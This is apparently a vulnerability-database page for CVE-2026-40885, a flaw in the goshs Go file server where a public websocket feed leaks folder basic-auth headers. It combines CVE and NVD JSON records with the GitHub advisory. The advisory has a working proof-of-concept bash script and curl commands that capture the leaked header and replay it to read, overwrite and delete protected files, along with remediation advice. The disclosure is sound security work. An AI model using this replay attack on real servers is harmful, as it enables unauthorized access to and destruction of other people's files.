Vulnerability-Lookup

CVE-2026-40885 (GCVE-0-2026-40885)

Vulnerability from cvelistv5 – Published: 2026-04-21 19:40 – Updated: 2026-04-21 20:05

Title

goshs: Public collaborator feed leaks .goshs ACL credentials and enables unauthorized access

Summary

goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. This vulnerability is fixed in 2.0.0-beta.6.

Severity ?

7.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

URL

Tags

https://github.com/patrickhener/goshs/security/ad…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	patrickhener	goshs	Affected: >= 2.0.0-beta.4, < 2.0.0-beta.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40885",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-21T20:05:21.029819Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-21T20:05:26.627Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "goshs",
          "vendor": "patrickhener",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 2.0.0-beta.4, \u003c 2.0.0-beta.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim\u0027s folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. This vulnerability is fixed in 2.0.0-beta.6."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T19:40:37.272Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
        }
      ],
      "source": {
        "advisory": "GHSA-7h3j-592v-jcrp",
        "discovery": "UNKNOWN"
      },
      "title": "goshs: Public collaborator feed leaks .goshs ACL credentials and enables unauthorized access"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40885",
    "datePublished": "2026-04-21T19:40:37.272Z",
    "dateReserved": "2026-04-15T15:57:41.719Z",
    "dateUpdated": "2026-04-21T20:05:26.627Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40885",
      "date": "2026-04-23",
      "epss": "0.00068",
      "percentile": "0.21084"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40885\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T20:17:02.257\",\"lastModified\":\"2026-04-22T21:24:26.997\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim\u0027s folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. This vulnerability is fixed in 2.0.0-beta.6.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"references\":[{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40885\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-21T20:05:21.029819Z\"}}}], \"references\": [{\"url\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-21T20:05:14.784Z\"}}], \"cna\": {\"title\": \"goshs: Public collaborator feed leaks .goshs ACL credentials and enables unauthorized access\", \"source\": {\"advisory\": \"GHSA-7h3j-592v-jcrp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"patrickhener\", \"product\": \"goshs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.0.0-beta.4, \u003c 2.0.0-beta.6\"}]}], \"references\": [{\"url\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp\", \"name\": \"https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim\u0027s folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. This vulnerability is fixed in 2.0.0-beta.6.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T19:40:37.272Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40885\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-21T20:05:26.627Z\", \"dateReserved\": \"2026-04-15T15:57:41.719Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T19:40:37.272Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40885

Vulnerability from fkie_nvd - Published: 2026-04-21 20:17 - Updated: 2026-04-22 21:24

Severity ?

7.7 (High) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "goshs is a SimpleHTTPServer written in Go. From 2.0.0-beta.4 to 2.0.0-beta.5, goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim\u0027s folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. This vulnerability is fixed in 2.0.0-beta.6."
    }
  ],
  "id": "CVE-2026-40885",
  "lastModified": "2026-04-22T21:24:26.997",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-21T20:17:02.257",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-7h3j-592v-jcrp"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-7H3J-592V-JCRP

Vulnerability from github – Published: 2026-04-14 22:28 – Updated: 2026-04-15 21:18

Summary

goshs's public collaborator feed leaks .goshs ACL credentials and enables unauthorized access

Details

Summary

goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to .goshs-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including Authorization. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on v2.0.0-beta.5, the latest supported release as of April 10, 2026.

Details

The main web UI and collaborator websocket stay public when goshs is started without global -b user:pass authentication:

httpserver/server.go:72-85 only installs BasicAuthMiddleware() when a global username or password is configured

The vulnerable request is logged before .goshs authorization is enforced:

httpserver/handler.go:277-279 calls emitCollabEvent() and logger.LogRequest() before the protected file is passed into ACL enforcement
httpserver/handler.go:291-309 performs folder-level .goshs authentication later in applyCustomAuth()

The collaborator pipeline copies and broadcasts every request header:

httpserver/collaborator.go:22-46 flattens all request headers, including Authorization, into the websocket event and sends them to the hub
ws/hub.go:77-84 fans the event out live to all connected websocket clients
ws/hub.go:116-122 replays up to 200 prior HTTP events to newly connected websocket clients via catchup

The frontend also makes the leak easier to understand by decoding authorization values:

assets/js/main.js:627-645 formats and decodes the Authorization header for display in the collaborator panel

In practice, a victim request such as:

GET /ACLAuth/secret.txt
Authorization: Basic YWRtaW46YWRtaW4=

is visible to any public websocket observer before the protected file's ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim's effective access.

PoC

Manual verification commands used:

Terminal 1

cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./

rm -rf /tmp/goshs_collab_root
mkdir -p /tmp/goshs_collab_root/ACLAuth
cp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs
printf 'very secret\n' > /tmp/goshs_collab_root/ACLAuth/secret.txt

/tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096

Terminal 2

node - <<'NODE'
const ws = new WebSocket('ws://127.0.0.1:18096/?ws');
ws.onmessage = (ev) => console.log(ev.data.toString());
NODE

Terminal 3

curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt
curl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt
curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt
curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -X PUT --data-binary 'owned' http://127.0.0.1:18096/ACLAuth/pwn.txt
curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' 'http://127.0.0.1:18096/ACLAuth/secret.txt?delete'

Two terminal commands I ran during local validation:

curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt
curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt

Observed results from manual verification:

the anonymous request returned 401
the victim request returned very secret
the replayed leaked header also returned very secret
the replayed PUT returned 200
the replayed ?delete returned 200
the public websocket showed Authorization":"Basic YWRtaW46YWRtaW4="

PoC Video 1:

https://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752

Single-script verification:

'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4'

Observed script result:

Captured header: Basic YWRtaW46YWRtaW4=
Anonymous GET status: 401
Replayed-header GET body: very secret
Replayed-header PUT status: 200
Replayed-header delete status: 200
[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree

PoC Video 2:

https://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472

gosh_poc4 script content:

#!/usr/bin/env bash
set -euo pipefail

REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
FIXTURE='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth'
BIN='/tmp/goshs_beta5_collab_leak'
PORT='18096'
WORKDIR="$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
WS_LOG="$WORKDIR/ws.log"
GOSHS_PID=""
WATCH_PID=""

cleanup() {
  if [[ -n "${WATCH_PID:-}" ]]; then
    kill "${WATCH_PID}" >/dev/null 2>&1 || true
    wait "${WATCH_PID}" 2>/dev/null || true
  fi
  if [[ -n "${GOSHS_PID:-}" ]]; then
    kill "${GOSHS_PID}" >/dev/null 2>&1 || true
    wait "${GOSHS_PID}" 2>/dev/null || true
  fi
}
trap cleanup EXIT

mkdir -p "${ROOT}/ACLAuth"
cp "${FIXTURE}" "${ROOT}/ACLAuth/.goshs"
printf 'very secret\n' > "${ROOT}/ACLAuth/secret.txt"

echo "[1/6] Building goshs beta.5"
(cd "${REPO}" && go build -o "${BIN}" ./)

echo "[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}"
"${BIN}" -d "${ROOT}" -p "${PORT}" >"${WORKDIR}/goshs.log" 2>&1 &
GOSHS_PID=$!

for _ in $(seq 1 40); do
  if curl -s "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
    break
  fi
  sleep 0.25
done

echo "[3/6] Opening an unauthenticated websocket observer"
node - <<'NODE' >"${WS_LOG}" &
const ws = new WebSocket('ws://127.0.0.1:18096/?ws');
ws.onopen = () => console.log('OPEN');
ws.onmessage = (ev) => {
  const msg = ev.data.toString();
  console.log(msg);
  if (msg.includes('Authorization')) process.exit(0);
};
setTimeout(() => process.exit(0), 10000);
NODE
WATCH_PID=$!

echo "[4/6] Simulating a victim request with folder credentials"
curl -s -u admin:admin "http://127.0.0.1:${PORT}/ACLAuth/secret.txt" >/dev/null
wait "${WATCH_PID}" || true
WATCH_PID=""

LEAKED_HEADER="$(python3 - "${WS_LOG}" <<'PY'
import pathlib
import re
import sys

text = pathlib.Path(sys.argv[1]).read_text()
m = re.search(r'Basic [A-Za-z0-9+/=]+', text)
print(m.group(0) if m else '')
PY
)"

if [[ -z "${LEAKED_HEADER}" ]]; then
  echo "[ERROR] No leaked Authorization header was captured." >&2
  echo "[DEBUG] Websocket output:" >&2
  cat "${WS_LOG}" >&2
  exit 1
fi

echo "[5/6] Replaying the leaked header as the attacker"
UNAUTH_CODE="$(curl -s -o /dev/null -w '%{http_code}' "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")"
READ_BACK="$(curl -s -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")"
PUT_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" -X PUT --data-binary 'owned' "http://127.0.0.1:${PORT}/ACLAuth/pwn.txt")"
DELETE_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete")"

if [[ "${UNAUTH_CODE}" != "401" ]]; then
  echo "[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}." >&2
  exit 1
fi

if [[ "${READ_BACK}" != "very secret" ]]; then
  echo "[ERROR] Replayed header did not unlock the protected file." >&2
  exit 1
fi

if [[ "${PUT_CODE}" != "200" ]]; then
  echo "[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}." >&2
  exit 1
fi

if [[ "${DELETE_CODE}" != "200" ]]; then
  echo "[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}." >&2
  exit 1
fi

if [[ ! -f "${ROOT}/ACLAuth/pwn.txt" ]]; then
  echo "[ERROR] PUT did not create pwn.txt." >&2
  exit 1
fi

if [[ -f "${ROOT}/ACLAuth/secret.txt" ]]; then
  echo "[ERROR] Delete did not remove secret.txt." >&2
  exit 1
fi

echo "[6/6] Results"
echo "Captured header: ${LEAKED_HEADER}"
echo "Anonymous GET status: ${UNAUTH_CODE}"
echo "Replayed-header GET body: ${READ_BACK}"
echo "Replayed-header PUT status: ${PUT_CODE}"
echo "Replayed-header delete status: ${DELETE_CODE}"
echo "[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree"

Impact

This issue is a sensitive information disclosure that becomes an authentication bypass against .goshs-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective .goshs-protected subfolders are directly exposed.

Remediation

Suggested fixes:

Never store or broadcast sensitive headers such as Authorization, Cookie, or Proxy-Authorization in collaborator events.
Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies.
Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.

Severity ?

7.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.0-beta.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/patrickhener/goshs/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.4"
            },
            {
              "fixed": "2.0.0-beta.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:28:54Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\ngoshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to `.goshs`-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including `Authorization`. An unauthenticated observer can capture a victim\u0027s folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on `v2.0.0-beta.5`, the latest supported release as of April 10, 2026.\n\n### Details\nThe main web UI and collaborator websocket stay public when goshs is started without global `-b user:pass` authentication:\n\n- `httpserver/server.go:72-85` only installs `BasicAuthMiddleware()` when a global username or password is configured\n\nThe vulnerable request is logged before `.goshs` authorization is enforced:\n\n- `httpserver/handler.go:277-279` calls `emitCollabEvent()` and `logger.LogRequest()` before the protected file is passed into ACL enforcement\n- `httpserver/handler.go:291-309` performs folder-level `.goshs` authentication later in `applyCustomAuth()`\n\nThe collaborator pipeline copies and broadcasts every request header:\n\n- `httpserver/collaborator.go:22-46` flattens all request headers, including `Authorization`, into the websocket event and sends them to the hub\n- `ws/hub.go:77-84` fans the event out live to all connected websocket clients\n- `ws/hub.go:116-122` replays up to 200 prior HTTP events to newly connected websocket clients via catchup\n\nThe frontend also makes the leak easier to understand by decoding authorization values:\n\n- `assets/js/main.js:627-645` formats and decodes the `Authorization` header for display in the collaborator panel\n\nIn practice, a victim request such as:\n\n```http\nGET /ACLAuth/secret.txt\nAuthorization: Basic YWRtaW46YWRtaW4=\n```\n\nis visible to any public websocket observer before the protected file\u0027s ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim\u0027s effective access.\n\n### PoC\nManual verification commands used:\n\n`Terminal 1`\n\n```bash\ncd \u0027/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5\u0027\ngo build -o /tmp/goshs_beta5 ./\n\nrm -rf /tmp/goshs_collab_root\nmkdir -p /tmp/goshs_collab_root/ACLAuth\ncp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs\nprintf \u0027very secret\\n\u0027 \u003e /tmp/goshs_collab_root/ACLAuth/secret.txt\n\n/tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096\n```\n\n`Terminal 2`\n\n```bash\nnode - \u003c\u003c\u0027NODE\u0027\nconst ws = new WebSocket(\u0027ws://127.0.0.1:18096/?ws\u0027);\nws.onmessage = (ev) =\u003e console.log(ev.data.toString());\nNODE\n```\n\n`Terminal 3`\n\n```bash\ncurl -s -o /dev/null -w \u0027%{http_code}\\n\u0027 http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -o /dev/null -w \u0027%{http_code}\\n\u0027 -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -X PUT --data-binary \u0027owned\u0027 http://127.0.0.1:18096/ACLAuth/pwn.txt\ncurl -s -o /dev/null -w \u0027%{http_code}\\n\u0027 -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 \u0027http://127.0.0.1:18096/ACLAuth/secret.txt?delete\u0027\n```\n\nTwo terminal commands I ran during local validation:\n\n```bash\ncurl -s -o /dev/null -w \u0027%{http_code}\\n\u0027 http://127.0.0.1:18096/ACLAuth/secret.txt\ncurl -s -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 http://127.0.0.1:18096/ACLAuth/secret.txt\n```\n\nObserved results from manual verification:\n\n- the anonymous request returned `401`\n- the victim request returned `very secret`\n- the replayed leaked header also returned `very secret`\n- the replayed `PUT` returned `200`\n- the replayed `?delete` returned `200`\n- the public websocket showed `Authorization\":\"Basic YWRtaW46YWRtaW4=\"`\n\nPoC Video 1:\n\nhttps://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752\n\n\n\nSingle-script verification:\n\n```bash\n\u0027/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4\u0027\n```\n\nObserved script result:\n\n- `Captured header: Basic YWRtaW46YWRtaW4=`\n- `Anonymous GET status: 401`\n- `Replayed-header GET body: very secret`\n- `Replayed-header PUT status: 200`\n- `Replayed-header delete status: 200`\n- `[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree`\n\nPoC Video 